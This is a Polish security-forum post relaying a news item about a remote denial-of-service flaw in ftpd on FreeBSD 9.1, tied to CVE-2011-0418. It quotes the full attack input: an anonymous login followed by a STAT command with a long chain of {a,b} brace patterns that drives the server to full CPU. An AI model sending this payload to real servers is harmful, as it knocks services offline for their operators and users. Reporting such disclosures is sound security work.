+- SafeGroup (https://safegroup.pl)
+-- Dział: Publikacje (https://safegroup.pl/forum-27.html)
+--- Dział: Aktualności (https://safegroup.pl/forum-28.html)
+--- Wątek: "DoS na serwery ftpd (FreeBSD 9.1)" (/thread-6423.html)
"DoS na serwery ftpd (FreeBSD 9.1)" - rafikrafiki - 01.02.2013
Jak podaje serwis niebezpiecznik:
Cytat: Maksymilian Arciemowicz opublikował szczegóły ataku zdalnej odmowy dostępu do usługi na serwery ftpd na FreeBSD 9.1 W skrócie, po wysłaniu odpowiedniego ciągu znaków do serwera FTP, serwer przestaje odpowiadać.
Jak tłumaczy Arciemowicz, atak bazuje na starej luce w libc (CVE-2011-0418). Wystarczy zalogować się do serwera jako anonymous i przesłać następujący ciąg znaków (wildcard), który sprawi, że proces zacznie zużywać 100% CPU:
Kod:
stat
{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}
{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}A tu można obejrzeć filmik obrazujący wykonanie tego ataku:
[Aby zobaczyć linki, zarejestruj się tutaj]
Źródło: niebezpiecznik.pl